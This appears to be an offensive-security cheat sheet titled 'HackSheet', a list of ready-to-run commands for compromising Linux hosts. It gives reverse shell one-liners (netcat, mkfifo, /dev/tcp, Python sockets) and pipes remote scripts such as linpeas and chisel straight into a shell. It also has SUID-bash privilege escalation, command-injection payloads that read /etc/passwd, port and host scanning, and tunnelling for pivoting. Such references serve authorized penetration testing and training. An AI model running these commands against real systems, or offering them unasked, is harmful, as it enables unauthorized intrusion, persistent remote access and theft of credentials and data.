HackSheet


Sudo

sudo -l

Enumeration

Script

LinPeas

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Linux Smart Enumeration

curl "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -Lo lse.sh
chmod +x lse.sh
./lse.sh -l1

Metasploit

msfconsole -q -x 'use exploit; set RHOSTS ip; set RPORT port; run; exit'

Docker

curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh -O

File

Classic

Proc

/proc/ contains useful information about the processes that are currently running

directory description
/proc/PID/cmdline Command line arguments.
/proc/PID/cwd Link to the current working directory.
/proc/PID/environ Values of environment variables.
/proc/PID/exe Link to the executable of this process.
/proc/PID/fd Directory, which contains all file descriptors.

Command

find / -user user 2>&-
find / -group group 2>&-
find / -user root -executable -type f 2>&- | grep -v /bin/
/sbin/getcap -r *

Reverse Shell

Server

nc -lp 4444

reSH

# Client
resh ip 4444
# Server
resh 4444

Source

Netcat

nc ip 4444 -e /bin/bash

Mkfifo

mkfifo /tmp/f;nc ip 4444 0</tmp/f|/bin/sh -i 2>&1|tee /tmp/f

Dev

bash -c 'bash -i >& /dev/tcp/ip/4444 0>&1'"

Python

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

TTY Support

bash -i
python3 -c 'import pty; pty.spawn("/bin/bash")'
script -qc /bin/bash /dev/null

rlwrap

rlwrap is a ‘readline wrapper’, a small utility that uses the GNU Readline library to allow the editing of keyboard input for any command. For when you cannot spawn a proper TTY source

rlwrap command
# Receiving connection from a reverse shell
rlwrap nc -lnvp port

# Connecting to the victim
rlwrap nc ip port

# Add actual bash history and to put all words seen on in- and output on the completion list.
rlwrap nc -r -f . nc ip port

source

Privilege Escalation

/bin/cp /bin/bash /tmp/bash_up; /bin/chown user:group /tmp/bash_up; chmod g+s /tmp/bash_up; chmod u+s /tmp/bash_up
/tmp/bash_up -p
chmod 4755 /bin/bash
bash -p

FTP

Port: 21

File transfer protocol (FTP) is an Internet tool provided by TCP/IP. It helps to transfer files from one computer to another by providing access to directories or folders on remote computers

Scan

nmap --script ftp-* -p 21 ip

Download all files

wget -m --user=user --password=fpassword ftp://ip
wget -m --user=anonymous --password=anonymous ftp://ip

Gdbserver

Port: 1337

Gdbserver is a computer program that makes it possible to remotely debug other programs. You need to have a copy of the program you want to debug put onto the target system.

$ gdb
(gdb) target extended-remote ip:port
(gdb) remote get remote_file local_file
(gdb) remote put local_file remote_file

Command Injection

;{cat,/etc/passwd}
;cat${IFS}/etc/passwd;
; cat /etc/passwd ;
$(cat /etc/passwd)
`cat /etc/passwd`
&& cat /etc/passwd &&
|| cat /etc/passwd ||
< <(cat /etc/passwd)
| cat /etc/passwd
"; cat /etc/passwd "

GTFOBins - Bypass local security restrictions

Network

Netstat

netstat -tulpn

Scan Port

for port in {1..65535}; do echo > /dev/tcp/ip/$port && echo "$port open"; done 2>/dev/null

Scan Ip

for i in {1..254}; do (ping -c 1 192.168.1.${i} | grep "bytes from" | grep -v "Unreachable" &); done;

Port Forwarding

Chisel

# Install chisel
curl https://i.jpillora.com/chisel! | bash
# Example: 8000 -> 4444

# Attacker machine:
chisel server -p 4444 --reverse

# Victim machine:
chisel client ip-server:4444 R:8000:127.0.0.1:8000

SSH

ssh -L 8080:127.0.0.1:8080 user@ip

SCP

Download File

scp -P port user@192.168.1.ip:path .

Upload File

scp -P port file user@192.168.1.ip:path

Upload peda

scp -P 22 -r ~/.peda user@192.168.1.ip:/tmp/peda